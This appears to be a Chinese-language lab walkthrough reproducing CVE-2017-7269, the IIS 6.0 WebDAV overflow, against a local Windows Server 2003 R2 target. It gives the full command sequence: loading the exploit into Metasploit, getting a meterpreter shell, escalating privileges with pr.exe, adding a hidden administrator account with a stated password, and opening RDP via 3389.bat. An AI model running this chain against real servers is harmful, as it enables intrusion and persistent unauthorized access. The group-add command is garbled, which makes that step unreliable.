##01漏洞描述
CVE_2017_7269漏洞属于高危漏洞,是由Zhiniang Peng和Chen Wu发现的。IIS6.0开启Webdav服务的服务器被爆存在缓存区溢出漏洞导致远程代码随意执行,目前针对 Windows Server 2003 R2可以稳定利用。
下面开始复现cve_2017_7269 漏洞并拿下windows 2003 R2权限并远程登录服务器:
##02靶机实验环境
目标主机:Windows Server 2003 R2
镜像种子文件用迅雷下载:
ed2k://|file|cn_win_srv_2003_r2_enterprise_with_sp2_vl_cd1_X13-46432.iso|637917184|284DC0E76945125035B9208B9199E465|/
IP:192.168.1.104
A.安装IIS6.0服务:
B.打开WebDAV服务拓展:
攻击机:kali Linux
镜像下载:https://www.kali.org/downloads/
IP:192.168.1.106
##03配置攻击套件
--首先我们在GitHub下载EXP文件,输入:
>git clone https:/ /github.com/zcgonvh/cve-2017-7269 //下载EXP文件
> ls //查看当前目录下的文件,看是否下载成功
--然后我们需要复制EXP到msf框架中
#注意复制时下划线不要写成cve-2017-7269.rb#,要先重命名这个文件为cve_2017_7269.rb之后,再输入:
> cp cve_2017_7269.rb/usr/share/metasploit-framework/modules/exploits/windows/iis/ //复制EXP到 msf的相应目录下
--然后我们看有没有复制成功
> cd /usr/share/metasploit-framework/modules/exploits/windows/iis/ //进入到复制后,EXP存放的相应目录下> ls //查看当前目录下的文件
--我们首先使用nmap工具扫描一下目标靶机的端口情况,输入:
>nmap 192.168.1.104 //扫描192.168.1.104查看端口情况
#可以看到我们要攻击的80端口已经开启#
##04利用Metasploit开始攻击
打开Metasploit,直接点击打开
--然后我们要用use命令使用刚才复制进去的EXP套件,输入:
msf5> use exploit/windows/iis/cve_2017_7269 //使用此攻击套件
msf5 > show options //查看需要的配置
发现只需要配置RHOSTS(目标IP),把RPORT(目标端口)也配置下
msf5 > set rhosts 192.168.1.104 // 设置目标的IPmsf5 > set rport 80 //设置目标端口为80
--最后exploit开始输出执行
msf5 > exploit //开始执行
我们成功利用7269漏洞拿到了目标靶机的meterpreter!看过PANDA上一篇文章的读者都知道下一步是输入shell,然后完成我们渗透攻击的过程,但是…
##05进行下一步的提权
拿目标的shell,我们输入:
meterpreter >shell //建立交互拿到目标shell,进入命令行界面c:\windows\system32\inetsrv> whoami //查看当前用户权限,但是发现只是个普通用户权限...
--我们尝试在当前目录下创建一个新目录(发现当前用户没有此权限,所以创建失败了)
c:\windows\system32\inetsrv>md 555 //在当前目录下创建555目录文件,创建失败
--我们进入到C盘的根目录,尝试创建yhs目录文件发现成功了, 注意#实际情况就得慢慢试了#
c:\windows\system32\inetsrv> cd c:\ //进入C盘根目录c:\> md yhs //创建yhs目录c:\yhs> dir //查看yhs文件夹的目录
-然后输入exit命令回到metepreter>
用upload命令上传Pr.exe文件到刚才创建的yhs目录下,输入:
C:\yhs> exit // 退回到 metepreter>meterpreter > upload '/root/pr.exe ' c:\\yhs //上传文件到yhs目录下,使用的是绝对路径
--接下来我们借助提权工具pr.exe进行提权进行下一步后渗透操作
利用pr.exe进行提权,输入:
C:\yhs>pr.exe "whoami" //利用提权工具提升当前用户权限
#可以看到我们成功地拿下了system最高权限#
--我们创建用户yhs用来远程登录目标服务器,输入:
C:\yhs>pr.exe "net user yhs lovegyw /add" //创建yhs用户,密码是lovegyw
--查看系统用户列表,输入:
C:\yhs>net user //查看用户列表,发现yhs创建成功
--将yhs用户加入到Administrators组里面,输入:
C:\yhs>pr.exe "net localhost administrators yhs /add" //将yhs加入到管理员组,让yhs拥有管理员权限
用户yhs准备完毕,准备远程登录
##06远程登录服务器
用户创建成功了,我们怎样远程登录到目标服务器呢,我们需要再上传一个3389.bat到c:\\yhs目录下,利用pr.exe运行,打开目标服务器的3389端口,实现远程登录,输入:
meterpreter >upload '/root/3389.bat ' c:\\yhs //上传3389.bat文件,使用的是绝对路径
--然后我们回到c:\\yhs目录使用工具开启3389端口,输入:
C:\yhs>pr.exe "call 3389.bat" //启动3389.bat开启目标服务器3389端口
--再次使用nmap扫描一下服务器端口是否成功打开,输入:
>nmap 192.168.1.104 // 扫描192.168.1.104的端口情况,发现3389端口成功打开
--发现3389成功打开,我们就可以实施远程登录服务器的操作了,打开终端窗口输入:
>rdesktop 192.168.1.104 //使用命令rdesktop打开远程登录窗口
--在远程登录窗口输入刚才创建的yhs用户#用户名:yhs;密码:lovegyw,输入界面:
--然后敲下回车键,远程登录目标服务器 Succesful!
